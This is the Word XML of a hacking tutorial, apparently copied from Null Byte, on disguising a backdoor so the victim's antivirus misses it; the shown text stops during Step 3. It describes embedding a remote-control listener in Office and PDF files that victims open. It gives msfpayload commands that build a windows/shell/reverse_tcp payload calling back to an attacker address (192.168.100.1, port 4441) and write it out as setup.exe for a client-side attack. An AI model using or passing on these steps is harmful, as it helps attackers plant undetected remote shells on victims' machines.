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9D0" w:rsidRPr="008D49D0" w:rsidRDefault="008D49D0" w:rsidP="008D49D0">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8D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://null-byte.wonderhowto.com/how-to/hack-like-pro-bypass-antivirus-software-by-disguising-exploits-signature-0141122/" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Bypass Antivirus Software by Disguising an Exploit's Signature </w:t>
      </w:r>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D49D0" w:rsidRPr="008D49D0" w:rsidRDefault="008D49D0" w:rsidP="008D49D0">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">By </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="008D49D0">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>occupytheweb</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  01/17/2013 9:57 pm </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 xml:space="preserve">In my last few articles, I've concentrated on what is called a </w:t>
      </w:r>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>listener</w:t>
      </w:r>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is basically the same thing as </w:t>
      </w:r>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rootkit</w:t>
      </w:r>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, only "listener" sounds much less malevolent than the other two terms.</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 xml:space="preserve">First, I covered embedding a listener in a </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="008D49D0">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Microsoft Office document</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Excel, PowerPoint, Word, etc.), then in an </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="008D49D0">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Adobe Reader PDF file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. In both cases, when the victim opens the file, a small program runs in the background that allows us to connect to their system and control it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D49D0" w:rsidRPr="008D49D0" w:rsidRDefault="008D49D0" w:rsidP="008D49D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D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>The Problem</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The only possible hitch in this scenario is that the victim's antivirus program is activated, is up to date, and detects our little program. In that case, the victim is unlikely to open the file and we don't get to play. But, in this lesson, I'll show you how to morph the listener so that the victim's antivirus software is unlikely to detect it.</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All antivirus software is based upon the very simple idea of malware signatures. What this means is that the antivirus software publishers simply keep track of what the malicious software looks like—when your AV software updates each day, it picks all new signatures. When it detects something that looks like one of these signatures, they alert the user and quarantine the malicious software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D49D0" w:rsidRPr="008D49D0" w:rsidRDefault="008D49D0" w:rsidP="008D49D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D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>The Exploit</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Fortunately for us, we can essentially change the signature of our malicious software without changing what it does. We simply re-code in a way that the AV software doesn't have a signature of. Pretty simple, wouldn't you say?</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 xml:space="preserve">Okay. Once again, fire up your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BackTrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="008D49D0">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Metasploit</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and let's get working on some metamorphosis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D49D0" w:rsidRDefault="008D49D0" w:rsidP="008D49D0">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8D49D0" w:rsidRPr="008D49D0" w:rsidRDefault="008D49D0" w:rsidP="008D49D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D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 1 Explore </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 xml:space="preserve">Let's start by exploring </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as part of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> suite. By typing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the –h switch, we can get the help screen on this module.</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8D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D49D0" w:rsidRPr="008D49D0" w:rsidRDefault="008D49D0" w:rsidP="008D49D0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6089904" cy="4343400"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="https://img.wonderhowto.com/img/18/56/63493952568496/0/hack-like-pro-bypass-antivirus-software-by-disguising-exploits-signatur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18/56/63493952568496/0/hack-like-pro-bypass-antivirus-software-by-disguising-exploits-signature.w1456.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9904" cy="4343400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Notice in the screenshot above that the syntax for this module includes options, the payload, and then several values that enable us to encode the payload using various programming languages including C, Perl, Ruby, Raw, VBA and others.</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> enables us to convert the code of the payload into any of these choices and thereby better evade the victim's AV software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D49D0" w:rsidRPr="008D49D0" w:rsidRDefault="008D49D0" w:rsidP="008D49D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D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Step 2 Generate a Custom Payload</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Let's proceed to generate a customized payload in C.</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8D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> windows/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o</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 xml:space="preserve">Notice that we used the –o option and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> displays our various options. To generate the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> customized payload we need to pass the options to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, in this case the LHOST and the LPORT. Let's set those to our machine 192.168.100.1 and the LPORT to 4441.</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We need to now generate a custom payload in C by typing:</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8D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> windows/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.100.1 LPORT=4441 C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D49D0" w:rsidRPr="008D49D0" w:rsidRDefault="008D49D0" w:rsidP="008D49D0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6099048" cy="4352544"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="https://img.wonderhowto.com/img/60/90/63493952581818/0/hack-like-pro-bypass-antivirus-software-by-disguising-exploits-signatur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0/90/63493952581818/0/hack-like-pro-bypass-antivirus-software-by-disguising-exploits-signature.w1456.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048" cy="4352544"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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 xml:space="preserve">Notice that we appended the command with a capital C to indicate that we wanted the payload to be generated in C. As you can see from screenshot above, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> generated the payload in C and displayed it to us.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D49D0" w:rsidRDefault="008D49D0" w:rsidP="008D49D0">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8D49D0" w:rsidRPr="008D49D0" w:rsidRDefault="008D49D0" w:rsidP="008D49D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D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3 Generate the Binary Code</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Finally, we need to generate a binary executable for the shellcode which can use in our client side attack.</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8D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> windows/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.100.1 X &gt; setup.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D49D0" w:rsidRPr="008D49D0" w:rsidRDefault="008D49D0" w:rsidP="008D49D0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6099048" cy="4361688"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
